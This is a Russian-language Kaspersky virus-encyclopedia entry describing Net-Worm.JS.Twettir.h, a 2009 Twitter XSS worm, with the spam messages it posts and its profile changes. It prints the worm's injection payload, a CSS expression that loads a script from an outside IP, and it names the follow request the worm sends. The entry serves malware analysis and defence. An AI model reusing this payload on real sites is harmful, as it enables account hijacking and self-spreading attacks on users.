Russian

Вход

Поиск

Интернет находится в нормальном состоянии, крупных эпидемий и других серьезных инцидентов службой мониторинга «Лаборатории Касперского» не зафиксировано.

Уровень опасности: 1

Следите в

Главная→Описания→Net-Worm.JS.Twettir.h

Net-Worm.JS.Twettir.h

Время детектирования	18 апр 2009 00:45 MSK
Время выпуска обновления	18 апр 2009 05:44 MSK
Описание опубликовано	22 апр 2009 16:01 MSK

Технические детали

Обфусцированный вариант червя.

Рассылаемые сообщения:

"Twitter, this sucks! Fix your coding".
"Twitter Security Team Really? You need to be fired".
"Horrible Coding! "
"@oprah - sup? welcome to twitter. - mikeyy"
"@aplusk - hey, homo. - mikeyy"
"@souljaboytellem - your music sucks dude. - mikeyy"
"@TheEllenShow - hey baby, love me long time? - mikeyy"
"@StephenColbert - you funny. - mikeyy"
"@cnnbrk - he's back. ;) - mikeyy"
"@nytimes - yep, it's true. - mikeyy"
"RT @mashable WARNING: Mikeyy Twitter Worm Returns!! - http://bit.ly/gxwHH"
"Twitter, do you know about the before_save model callback? - mikeyy"
"This exploit only affects Internet Explorer users. Thanks. - mikeyy"
"Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy "
"Get Firefox, thanks. www.Firefox.com"
"Twitter, you should be paying me now. - mikeyy"

Данный вариант червя изменяет параметр user[profile_sidebar_border_color], устанавливая его значение на следующее:

000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://74.200.253.195/xss.js')

В результате этого в профиле пользователя появляется ссылка на вредоносный XSS-скрипт.

Кроме того, червь изменяет следующие параметры пользователя:

user[name]
user[url]
user[description]
user[location]

на значение "Mikeyy", таким образом отображая это значение на странице у пользователя в полях Name, Location, Web, Bio.

Посылает POST-запрос на урл "/friendships/create/32336151", что соответствует добавлению в друзья пользователя с id 32336151, с ником followmehah.

Печать

Закладки

Вредоносные программы

Вирусы и черви

Net-Worm

Вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению в компьютерных сетях.

Отличительной особенностью данного типа червей является отсутствие необходимости в пользователе как в звене в цепочке распространения (т.е., непосредственно для активации вредоносной программы).

Зачастую при распространении такой червь ищет в сети компьютеры, на которых используется программное обеспечение, содержащее критические уязвимости. Для заражения уязвимых компьютеров червь посылает специально сформированный сетевой пакет (эксплойт), в результате чего код (или часть кода) червя проникает на компьютер-жертву и активируется. Если сетевой пакет содержит только часть кода червя, то после проникновения в уязвимый компьютер он скачивает основной файл червя и запускает его на исполнение.

Можно встретить сетевых червей данного типа, использующих сразу несколько эксплойтов для своего распространения, что увеличивает скорость нахождения ими компьютера-жертвы.

Другие модификации

Net-Worm.JS.Twettir.a

Net-Worm.JS.Twettir.b

Net-Worm.JS.Twettir.c

Net-Worm.JS.Twettir.d

Net-Worm.JS.Twettir.e

Net-Worm.JS.Twettir.f

Net-Worm.JS.Twettir.g

© ЗАО «Лаборатория Касперского», 1997-2010
Ведущий производитель систем защиты от вирусов, спама и хакерских атак
Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей

kaspersky.ru

securelist.com